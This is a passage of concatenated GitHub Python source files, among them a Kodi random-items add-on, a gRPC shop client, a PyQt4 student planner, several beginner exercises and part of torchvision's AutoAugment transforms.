\"RandomAlbum.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Album_Description\" % ( count ), item['description'] )\n\n def _fetch_artist_info( self ):\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetArtists\", \"params\": {\"properties\": [\"genre\", \"description\", \"fanart\", \"thumbnail\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": 
%d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('artists'):\n count = 0\n for item in jsonobject['result']['artists']:\n count += 1\n path = 'musicdb://2/' + str(item['artistid']) + '/'\n self.WINDOW.setProperty( \"RandomArtist.%d.Title\" % ( count ), item['label'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Genre\" % ( count ), \" / \".join( item['genre'] ) )\n self.WINDOW.setProperty( \"RandomArtist.%d.Path\" % ( count ), path )\n self.WINDOW.setProperty( \"RandomArtist.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Artist_Description\" % ( count ), item['description'] )\n\n def _fetch_song_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetSongs\", \"params\": {\"properties\": [\"title\", \"playcount\", \"artist\", \"album\", \"year\", \"file\", \"thumbnail\", \"fanart\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetSongs\", \"params\": {\"properties\": [\"title\", \"playcount\", \"artist\", \"album\", \"year\", \"file\", \"thumbnail\", \"fanart\", \"rating\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('songs'):\n count = 0\n for item in jsonobject['result']['songs']:\n count += 1\n self.WINDOW.setProperty( \"RandomSong.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Rating\" % ( count ), str(int(item['rating'])-48) )\n self.WINDOW.setProperty( \"RandomSong.%d.Year\" % ( count ), str(item['year']) )\n self.WINDOW.setProperty( \"RandomSong.%d.Artist\" % ( count ), \" / \".join( item['artist'] ) )\n self.WINDOW.setProperty( \"RandomSong.%d.Album\" % ( count ), item['album'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_addon_info( self ):\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"Addons.GetAddons\", \"params\": {\"properties\": [\"name\", \"author\", \"summary\", \"version\", \"fanart\", \"thumbnail\"]}, \"id\": 1}')\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('addons'):\n total = str( len( jsonobject['result']['addons'] ) )\n # find plugins and scripts\n addonlist = []\n for item in jsonobject['result']['addons']:\n if item['type'] == 'xbmc.python.script' or item['type'] == 'xbmc.python.pluginsource':\n addonlist.append(item)\n # randomize the list\n random.shuffle(addonlist)\n count = 0\n for item in addonlist:\n count += 1\n self.WINDOW.setProperty( 
\"RandomAddon.%d.Name\" % ( count ), item['name'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Author\" % ( count ), item['author'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Summary\" % ( count ), item['summary'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Version\" % ( count ), item['version'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Path\" % ( count ), item['addonid'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Type\" % ( count ), item['type'] )\n self.WINDOW.setProperty( \"RandomAddon.Count\" , total )\n # stop if we've reached the number of items we need\n if count == self.LIMIT:\n break\n\n def _daemon( self ):\n # keep running until xbmc exits or another instance is started\n while (not xbmc.abortRequested) and self.WINDOW.getProperty('RandomItems_Running') == 'True':\n xbmc.sleep(500)\n if xbmc.abortRequested:\n log('script stopped: xbmc quit')\n else:\n log('script stopped: new script instance started')\n\n def _update( self, type):\n xbmc.sleep(500)\n if type == 'movie':\n self._fetch_movies()\n elif type == 'episode':\n self._fetch_episode_info()\n elif type == 'video':\n self._fetch_movie_info()\n self._fetch_episode_info()\n self._fetch_musicvideo_info()\n elif type == 'album' or type == 'music':\n self._fetch_album_info()\n self._fetch_artist_info()\n self._fetch_song_info()\n\nclass MyMonitor(xbmc.Monitor):\n def __init__( self, *args, **kwargs ):\n xbmc.Monitor.__init__( self )\n self.action = kwargs['action']\n\n def onDatabaseUpdated( self, database):\n self.action(database)\n\nclass MyPlayer(xbmc.Player):\n def __init__( self, *args, **kwargs ):\n xbmc.Player.__init__( self )\n self.action = kwargs[ \"action\" ]\n self.substrings = [ '-trailer', 'http://' ]\n\n def onPlayBackStarted( self ):\n xbmc.sleep(1000)\n self.type = \"\"\n # Set values based on the file content\n if ( self.isPlayingAudio() ):\n self.type = \"album\" \n else:\n if xbmc.getCondVisibility( 'VideoPlayer.Content(movies)' ):\n filename = ''\n isMovie = True\n try:\n filename = self.getPlayingFile()\n except:\n pass\n if filename != '':\n for string in self.substrings:\n if string in filename:\n isMovie = False\n break\n if isMovie:\n self.type = \"movie\"\n elif xbmc.getCondVisibility( 'VideoPlayer.Content(episodes)' ):\n # Check for tv show title and season to make sure it's really an episode\n if xbmc.getInfoLabel('VideoPlayer.Season') != \"\" and xbmc.getInfoLabel('VideoPlayer.TVShowTitle') != \"\":\n self.type = \"episode\"\n\n def onPlayBackEnded( self ):\n if self.type == 'movie':\n self.action( 'movie')\n elif self.type == 'episode':\n self.action( 'episode')\n elif self.type == 'album':\n self.action('album')\n self.type = \"\"\n \n\n def onPlayBackStopped( self ):\n if self.type == 'movie':\n self.action( 'movie')\n elif self.type == 'episode':\n self.action( 'episode')\n elif self.type == 'album':\n self.action( 'album')\n self.type = \"\"\n \nif ( __name__ == \"__main__\" ):\n log('script version %s started' % __addonversion__)\n Main()\nlog('script stopped')\n","repo_name":"XBMC-Addons/script.randomitems","sub_path":"RandomItems.py","file_name":"RandomItems.py","file_ext":"py","file_size_in_byte":20417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17224210572","text":"from dataclasses import dataclass\n\nimport grpc\nfrom google.protobuf.json_format 
import MessageToDict\n\nimport products_pb2 as pb2\nimport products_pb2_grpc as pb2_grpc\nfrom configs import get_configs\nfrom constants import convert_category\nfrom schemas import Brand, Category, ProductResponseSchema, ServiceCenterSchema\n\n\n@dataclass\nclass GRPCProductsClient:\n host: str = get_configs().grpc_host\n port: int = 50051\n\n async def get_brands(self):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.BrandRequest(value='brand')\n results = await stub.GetBrands(message)\n return [Brand(id=x.id, value=x.name.title()) for x in results.results]\n\n async def get_categories(self, brand: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.CategoryRequest(brand=brand)\n results = await stub.GetCategories(message)\n return [Category(id=x.id, name=x.name, brand=x.brand) for x in results.results]\n\n async def get_products(self, brand: str, category: str, page: int | None = None):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n category = convert_category(category=category)\n if category:\n message_products = pb2.ProductsRequest(brand=brand.lower(), category=category, page=page)\n message_count = pb2.ProductsCountRequest(brand=brand.lower(), category=category)\n result = await stub.GetProducts(message_products)\n count = await stub.GetCount(message_count)\n return ProductResponseSchema(count_documents=count.products_count, products=result.products)\n\n async def get_specifications(self, product_id: int):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductRequest(product_id=product_id)\n result = await stub.GetSpecifications(message)\n return result.result\n\n async def get_product(self, product_id: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductRequest(product_id=product_id)\n return await stub.GetProduct(message)\n\n async def search(self, product_name: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ProductSearchRequest(product_name=product_name)\n try:\n return await stub.Search(message)\n except grpc.aio.AioRpcError as e:\n if e.code() == grpc.StatusCode.NOT_FOUND:\n return None\n\n async def get_service_center(self, city: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.ServiceCenterRequest(city=city)\n results = await stub.GetServiceCenter(message)\n return [ServiceCenterSchema(**MessageToDict(i)) for i in results.results]\n","repo_name":"sb-elliot-7s/telegram-bot-store","sub_path":"bot/grpc_service.py","file_name":"grpc_service.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73889282330","text":"def 
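# --- Editor's note: illustrative sketch, not part of the original grpc_service.py record. ---
# Each method of GRPCProductsClient above opens a fresh grpc.aio channel per call, with
# gzip compression, and awaits one stub method. A hypothetical driver showing how the
# class would be used; get_brands() is real in the record, while the event-loop wiring is
# the standard asyncio pattern, not code from the record, and needs the service running:
import asyncio

async def main():
    client = GRPCProductsClient()            # host/port come from configs, as above
    brands = await client.get_brands()
    for brand in brands:
        print(brand.id, brand.value)

# asyncio.run(main())   # requires the gRPC products service to be reachable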
sort(nums):\n for i in range(len(nums) - 1):\n minpos = i\n k = len(nums)\n for j in range(i, k):\n if nums[j] < nums[minpos]:\n minpos = j\n temp = nums[i]\n nums[i] = nums[minpos]\n nums[minpos] = temp\n\n\ndef input_data():\n i = input(\"\\nEnter the numbers : \").strip().split()\n return i\n\n\n# Basic way of getting input from the user\n# n = int(input(\"Enter number of elements : \"))\n# iterating till the range\n# for i in range(0, n):\n# ele = int(input())\n# lst.append(ele) # adding the element\n# print(lst)\n\n# using map and exception handling to get the input\ntry:\n print(\"Please use a [space] between each input.\")\n lst = list(map(int, input_data()))\n print(\"Unsorted list: \", lst)\n sort(lst)\n print(\"Sorted list: \", lst)\nexcept:\n print(\"Wrong inputs. Only use Int values.\")\n","repo_name":"GhostBat101/SomeBasicStuffs","sub_path":"selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18156591555","text":"from typing import Generator\nimport click\nfrom rich.markdown import Markdown\nfrom rich.console import Console\nfrom rich.live import Live\nfrom rich.style import Style\n\n\nclass CliView:\n COPY_INDICATOR = \"(press {index} to copy)\"\n STYLES = {\n \"title\": Style(color=\"bright_yellow\", bold=True, underline=True),\n \"success\": Style(color=\"green\"),\n \"error\": Style(color=\"bright_red\"),\n \"info\": Style(color=\"sky_blue3\"),\n }\n\n def __init__(self):\n self.console = Console()\n\n def get_user_input(self):\n first_line = click.prompt(\"Prompt >\", default=\"\", show_default=False)\n lines = [first_line]\n while True:\n line = input()\n if line:\n lines.append(line)\n else:\n break\n return \"\\n\".join(lines)\n\n def show_output(self, message) -> list[str]:\n markdown = Markdown(message)\n strings_to_copy = self._append_copy_marks_to_markdown(markdown)\n self.console.print(markdown)\n return strings_to_copy\n\n def clear(self):\n self.console.clear()\n\n def display_live_updates_from_generator(\n self, text_generator: Generator\n ) -> tuple[str, list[str]]:\n \"\"\"Displays content from the generator in real-time and returns the final content and copy-strings.\n\n Args:\n text_generator (Generator): Yields chunks of text to be displayed.\n\n Returns:\n tuple[str, list[str]]: Final displayed text and list of strings that can be copied.\n \"\"\"\n accumulated_text = \"Assistant >: \"\n strings_to_copy = []\n\n with Live(\n refresh_per_second=4\n ) as live: # Update 4 times a second for fluidity\n try:\n for chunk in text_generator:\n accumulated_text += chunk\n markdown_content = Markdown(accumulated_text, code_theme=\"\")\n strings_to_copy = self._append_copy_marks_to_markdown(\n markdown_content\n )\n live.update(markdown_content)\n except Exception as e:\n self.show_output(f\"An error occurred: {e}\")\n # Handle or log the error accordingly.\n\n return accumulated_text, strings_to_copy\n\n def _append_copy_marks_to_markdown(self, markdown: Markdown) -> list[str]:\n \"\"\"Appends copy marks to code elements in markdown and returns list of code strings.\n\n Args:\n markdown (Markdown): Markdown content to be modified.\n\n Returns:\n list[str]: List of code strings from the markdown.\n \"\"\"\n strings_to_copy = []\n for token in markdown.parsed:\n if token.tag == \"code\":\n strings_to_copy.append(token.content)\n token.content += self.COPY_INDICATOR.format(\n index=len(strings_to_copy)\n )\n return 
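# --- Editor's note: illustrative sketch, not part of the original selectionsort.py record. ---
# The selection sort above works, but the three-line temp swap can be a tuple swap, the
# bare `except:` (which hides every error, not just bad input) should catch ValueError,
# and the unused `k = len(nums)` can go. An equivalent, more idiomatic version of the
# same algorithm with a quick self-check:
def selection_sort(nums):
    for i in range(len(nums) - 1):
        # index of the smallest remaining element
        minpos = min(range(i, len(nums)), key=nums.__getitem__)
        nums[i], nums[minpos] = nums[minpos], nums[i]
    return nums

assert selection_sort([3, 1, 2]) == [1, 2, 3]
assert selection_sort([]) == []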
strings_to_copy\n\n    def print_info(self, message: str):\n        self.console.print(message, style=self.STYLES[\"info\"])\n\n    # self.console.print(, )\n","repo_name":"kornatskyi/HelperAI","sub_path":"hai/view/cli_view.py","file_name":"cli_view.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18418043240","text":"# good morning sumanth gowda\n\nstr=input(\"enter the string\")\nnew_str = ''\nfor char in range (0,len(str)):\n    if(str[char]=='o'):\n        new_str += 'z'\n    else:\n        new_str += str[char]\n\nprint(\"new string:\")\nprint(new_str)","repo_name":"sumi913/Assignments","sub_path":"PythonAssignment8/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8944850649","text":"import os\nimport re\n\nfilename = 'kishoreresume.txt'\nnewfilename = 'result.txt'\n\nos.path.isdir(\"C:/Users/kishore/Downloads/pdf_convert\")\ndata = open(filename,'r')\na = data.read()\n\nr = re.compile(r'(\\b[\\w.]+@+[\\w.]+.+[\\w.]\\b)')\nresults = r.findall(a)\nemail = \"\"\nfor x in results:\n\temail += str(x)+\"\\n\"\n\ndef writefile():\n\tf = open(newfilename, 'w')\n\tf.write(email)\n\tf.close()\n\tprint (\"File written.\")\nwritefile();","repo_name":"kishore1996/training","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6966713240","text":"# Determine the minimum number of coins that must be flipped\n# so that all the coins end up facing the same side.\n\nn = int(input('Enter the number of coins on the table: '))\n\norel = 0\nreshka = 0\n\nfor i in range(1,n+1):\n    print('If coin number ', i, 'is lying heads up enter 1, if tails enter 0', end='')\n    monetka = int(input(': '))\n    if monetka == 1:\n        orel +=1\n    else:\n        reshka +=1\n\nif orel > reshka:\n    print('You need to flip ', reshka, 'coins from tails to heads')\nelif orel < reshka:\n    print('You need to flip ', orel, 'coins from heads to tails')\nelif orel == reshka:\n    print('You need to flip ', orel, 'coins lying the same way')","repo_name":"VinnieThePoooh/GB_Py_DZ_2","sub_path":"folder1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28402825769","text":"import sys, os, datetime\r\nfrom PyQt4 import QtCore, QtGui, uic, QtSql\r\nimport sqlite3\r\nimport calendar_mod\r\nfrom createTask_auto import *\r\nclass MyForm(QtGui.QDialog):\r\n    def __init__(self,parent=None):\r\n        QtGui.QWidget.__init__(self, parent)\r\n        self.ui = Ui_Dialog()\r\n        self.ui.setupUi(self)\r\n        dbfile=\"studentplanner.db\"\r\n        self.conn=sqlite3.connect(dbfile)\r\n        self.ui.btn_start.clicked.connect(self.start)\r\n        self.ui.btn_end.clicked.connect(self.end)\r\n        self.ui.btn_process.clicked.connect(self.process)\r\n        if os.path.exists(dbfile):\r\n            db=QtSql.QSqlDatabase.addDatabase('QSQLITE')\r\n            db.setDatabaseName(dbfile)\r\n            db.open()\r\n        else:\r\n            QtGui.QMessageBox.critical(self,\"Critical Error\", \"Database file was not found here\")\r\n            return None\r\n        self.display()\r\n\r\n    def getuser(self):\r\n        cursor=self.conn.cursor()\r\n        statement=\"select username from current_user where user=\"+\"'\"+\"1\"+\"'\"\r\n        cursor.execute(statement)\r\n        self.conn.commit()\r\n        row=cursor.fetchall()\r\n        
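# --- Editor's note: illustrative sketch, not part of the original records. ---
# The pattern in the kishore1996/training regex record above, (\b[\w.]+@+[\w.]+.+[\w.]\b),
# uses `@+` (one or more '@' signs) and an unescaped `.` (any character), so it
# over-matches badly. A tighter pattern for simple address extraction; still a heuristic,
# not a full RFC 5322 parser, and the sample text is invented for the demo:
import re

pattern = re.compile(r'\b[\w.+-]+@[\w-]+\.[\w.-]+\b')
text = 'contact: jane.doe@example.com, bad@@x, ops@sub.example.org'
print(pattern.findall(text))   # ['jane.doe@example.com', 'ops@sub.example.org']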
row=str(row)\r\n row=row[3:8]\r\n return row\r\n\r\n def start(self):\r\n calendar = calendar_mod.MyForm(self)\r\n calendar.exec_()\r\n date = calendar.getdate()\r\n print(date)\r\n self.ui.de_start.setDisplayFormat('MMM d yyyy')\r\n self.ui.de_start.setDate(date)\r\n\r\n def end(self):\r\n calendar = calendar_mod.MyForm(self)\r\n calendar.exec_()\r\n date = calendar.getdate()\r\n print(date)\r\n self.ui.de_end.setDisplayFormat('MMM d yyyy')\r\n self.ui.de_end.setDate(date)\r\n\r\n def display(self):\r\n cursor=self.conn.cursor()\r\n self.ui.lw_activity.clear()\r\n self.ui.lw_activity.addItem(\"activity_id\\tactivity_name\\tactivity_type\")\r\n self.activity=self.getuser()+\"_activities\"\r\n cursor.execute(\"select activity_id,activity_name,activity_type from \"+self.activity+\" order by activity_id asc\")\r\n self.conn.commit()\r\n row=cursor.fetchall()\r\n print(row)\r\n for r in row:\r\n ac_id,ac_name,ac_type = r\r\n self.entry=str(ac_id)+\"\\t\"+str(ac_name)+\"\\t\"+str(ac_type)\r\n self.ui.lw_activity.addItem(self.entry)\r\n \r\n def process(self):\r\n name=self.ui.lne_task.text()\r\n self.item = self.ui.lw_activity.item(self.ui.lw_activity.currentRow()).text()\r\n self.item=str(self.item)\r\n ans=self.item\r\n end=ans.find(\"\\t\",2,len(ans))\r\n self.activity=str(self.item[2:end])\r\n self.type=str(self.item[end+1:])\r\n print(self.type)\r\n print(self.activity)\r\n assignedby=str(self.ui.lne_assignedby.text())\r\n duration=str(self.ui.lne_duration.text())\r\n priority=str(self.ui.lne_priority.text())\r\n start=self.ui.de_start.date()\r\n start=self.convertdate(start)\r\n end=self.ui.de_end.date()\r\n end=self.convertdate(end)\r\n print(start)\r\n print(end)\r\n datepriority=self.deadlinePriority(end)\r\n totalpriority=round(self.totalPriority(datepriority,int(priority)),0)\r\n \r\n ans=self.is_number(duration)\r\n if ans==True and priority.isdigit()==True:\r\n if int(priority)>=0 and int(priority)<=5:\r\n cursor=self.conn.cursor()\r\n self.tasks=self.getuser()+\"_tasks\"\r\n statement=\"insert into \"+self.tasks+\" (task_name,task_activity,task_type,assigned_by,duration,start_date,end_date,user_priority,date_priority,total_priority,status) VALUES (\"+'\"'+name+'\",\"'+self.activity+'\",\"'+self.type+'\",\"'+assignedby+'\",'+str(duration)+',\"'+start+'\",\"'+end+'\",'+str(priority)+\",\"+str(datepriority)+\",\"+str(totalpriority)+\",'pending')\"\r\n print(statement)\r\n cursor.execute(statement)\r\n self.conn.commit()\r\n self.close()\r\n\r\n else:\r\n QtGui.QMessageBox.critical(self,\"Critical Error\", \"Wrong data type entered in duration or priority. 
Please try again.\")\r\n\r\n def is_number(self,num):\r\n try:\r\n float(num)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n def deadlinePriority(self,deadline):#inputs a string\r\n newtoday=datetime.datetime.now()\r\n print(newtoday)\r\n todayyear=newtoday.year\r\n todaymonth=newtoday.month\r\n todayday=newtoday.day\r\n today=datetime.date(todayyear,todaymonth,todayday)\r\n datePriority = 0\r\n dMonth = int(deadline[3]+deadline[4])\r\n dYear = int(deadline[6]+deadline[7]+deadline[8]+deadline[9])\r\n dDay= int(deadline[0]+deadline[1])\r\n d=datetime.date(dYear,dMonth,dDay)\r\n print(d)\r\n print(today)\r\n dif=(d-today).days\r\n dif=int(dif)\r\n print(dif)\r\n d2= today.day\r\n dm = today.month\r\n dy = today.year\r\n if dif<=1:\r\n datePriority= 5\r\n elif dif<=3:\r\n datePriority= 4\r\n elif dif<=7:\r\n datePriority= 3\r\n elif dif<=14:\r\n datePriority= 2\r\n else:\r\n datePriority= 1\r\n return (datePriority)\r\n \r\n def totalPriority(self,deadlinePriority, userPriority): #both are from 1-5\r\n return (deadlinePriority*40/3+userPriority*20/3)\r\n\r\n\r\n def convertdate(self,date):\r\n selecteddate=str(date)\r\n if selecteddate[29]==')':\r\n selecteddate=selecteddate[19:29]\r\n else:\r\n selecteddate=selecteddate[19:30]\r\n print(\"\\t\\t\\t\"+selecteddate)\r\n dateselect=selecteddate.split(\", \")\r\n day=dateselect[2]\r\n month=dateselect[1]\r\n year=dateselect[0]\r\n newday=\"\"\r\n for j in day:\r\n if j=='[' or j==\"'\" or j=='(':\r\n pass\r\n else:\r\n newday=newday+j\r\n newyear=\"\"\r\n for k in year:\r\n if k==']' or k==\"'\" or k==')':\r\n pass\r\n else:\r\n newyear=newyear+k\r\n \r\n if len(newday)==1:\r\n newday=\"0\"+str(newday)\r\n \r\n if len(month)==1:\r\n month=\"0\"+str(month)\r\n dateoftask=newday+\"/\"+month+\"/\"+year\r\n return dateoftask\r\n\r\nif __name__==\"__main__\":\r\n app=QtGui.QApplication(sys.argv)\r\n myapp=MyForm()\r\n myapp.show()\r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"kohlsy/StudentPlanner","sub_path":"createTask_mod.py","file_name":"createTask_mod.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17994744835","text":"import math\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Type, Union\n\nimport PIL.Image\nimport torch\n\nfrom torch.utils._pytree import tree_flatten, tree_unflatten, TreeSpec\nfrom torchvision.prototype import features\nfrom torchvision.prototype.transforms import AutoAugmentPolicy, functional as F, InterpolationMode, Transform\nfrom torchvision.prototype.transforms.functional._meta import get_spatial_size\nfrom torchvision.transforms import functional_tensor as _FT\n\nfrom ._utils import _isinstance, _setup_fill_arg\n\n\nclass _AutoAugmentBase(Transform):\n def __init__(\n self,\n *,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__()\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_random_item(self, dct: Dict[str, Tuple[Callable, bool]]) -> Tuple[str, Tuple[Callable, bool]]:\n keys = tuple(dct.keys())\n key = keys[int(torch.randint(len(keys), ()))]\n return key, dct[key]\n\n def _flatten_and_extract_image_or_video(\n self,\n inputs: Any,\n unsupported_types: Tuple[Type, ...] 
= (features.BoundingBox, features.Mask),\n ) -> Tuple[Tuple[List[Any], TreeSpec, int], Union[features.ImageType, features.VideoType]]:\n flat_inputs, spec = tree_flatten(inputs if len(inputs) > 1 else inputs[0])\n\n image_or_videos = []\n for idx, inpt in enumerate(flat_inputs):\n if _isinstance(inpt, (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)):\n image_or_videos.append((idx, inpt))\n elif isinstance(inpt, unsupported_types):\n raise TypeError(f\"Inputs of type {type(inpt).__name__} are not supported by {type(self).__name__}()\")\n\n if not image_or_videos:\n raise TypeError(\"Found no image in the sample.\")\n if len(image_or_videos) > 1:\n raise TypeError(\n f\"Auto augment transformations are only properly defined for a single image or video, \"\n f\"but found {len(image_or_videos)}.\"\n )\n\n idx, image_or_video = image_or_videos[0]\n return (flat_inputs, spec, idx), image_or_video\n\n def _unflatten_and_insert_image_or_video(\n self,\n flat_inputs_with_spec: Tuple[List[Any], TreeSpec, int],\n image_or_video: Union[features.ImageType, features.VideoType],\n ) -> Any:\n flat_inputs, spec, idx = flat_inputs_with_spec\n flat_inputs[idx] = image_or_video\n return tree_unflatten(flat_inputs, spec)\n\n def _apply_image_or_video_transform(\n self,\n image: Union[features.ImageType, features.VideoType],\n transform_id: str,\n magnitude: float,\n interpolation: InterpolationMode,\n fill: Dict[Type, features.FillTypeJIT],\n ) -> Union[features.ImageType, features.VideoType]:\n fill_ = fill[type(image)]\n\n if transform_id == \"Identity\":\n return image\n elif transform_id == \"ShearX\":\n # magnitude should be arctan(magnitude)\n # official autoaug: (1, level, 0, 0, 1, 0)\n # https://github.com/tensorflow/models/blob/dd02069717128186b88afa8d857ce57d17957f03/research/autoaugment/augmentation_transforms.py#L290\n # compared to\n # torchvision: (1, tan(level), 0, 0, 1, 0)\n # https://github.com/pytorch/vision/blob/0c2373d0bba3499e95776e7936e207d8a1676e65/torchvision/transforms/functional.py#L976\n return F.affine(\n image,\n angle=0.0,\n translate=[0, 0],\n scale=1.0,\n shear=[math.degrees(math.atan(magnitude)), 0.0],\n interpolation=interpolation,\n fill=fill_,\n center=[0, 0],\n )\n elif transform_id == \"ShearY\":\n # magnitude should be arctan(magnitude)\n # See above\n return F.affine(\n image,\n angle=0.0,\n translate=[0, 0],\n scale=1.0,\n shear=[0.0, math.degrees(math.atan(magnitude))],\n interpolation=interpolation,\n fill=fill_,\n center=[0, 0],\n )\n elif transform_id == \"TranslateX\":\n return F.affine(\n image,\n angle=0.0,\n translate=[int(magnitude), 0],\n scale=1.0,\n interpolation=interpolation,\n shear=[0.0, 0.0],\n fill=fill_,\n )\n elif transform_id == \"TranslateY\":\n return F.affine(\n image,\n angle=0.0,\n translate=[0, int(magnitude)],\n scale=1.0,\n interpolation=interpolation,\n shear=[0.0, 0.0],\n fill=fill_,\n )\n elif transform_id == \"Rotate\":\n return F.rotate(image, angle=magnitude, interpolation=interpolation, fill=fill_)\n elif transform_id == \"Brightness\":\n return F.adjust_brightness(image, brightness_factor=1.0 + magnitude)\n elif transform_id == \"Color\":\n return F.adjust_saturation(image, saturation_factor=1.0 + magnitude)\n elif transform_id == \"Contrast\":\n return F.adjust_contrast(image, contrast_factor=1.0 + magnitude)\n elif transform_id == \"Sharpness\":\n return F.adjust_sharpness(image, sharpness_factor=1.0 + magnitude)\n elif transform_id == \"Posterize\":\n return F.posterize(image, bits=int(magnitude))\n 
elif transform_id == \"Solarize\":\n bound = _FT._max_value(image.dtype) if isinstance(image, torch.Tensor) else 255.0\n return F.solarize(image, threshold=bound * magnitude)\n elif transform_id == \"AutoContrast\":\n return F.autocontrast(image)\n elif transform_id == \"Equalize\":\n return F.equalize(image)\n elif transform_id == \"Invert\":\n return F.invert(image)\n else:\n raise ValueError(f\"No transform available for {transform_id}\")\n\n\nclass AutoAugment(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * width, num_bins),\n True,\n ),\n \"TranslateY\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * height, num_bins),\n True,\n ),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - 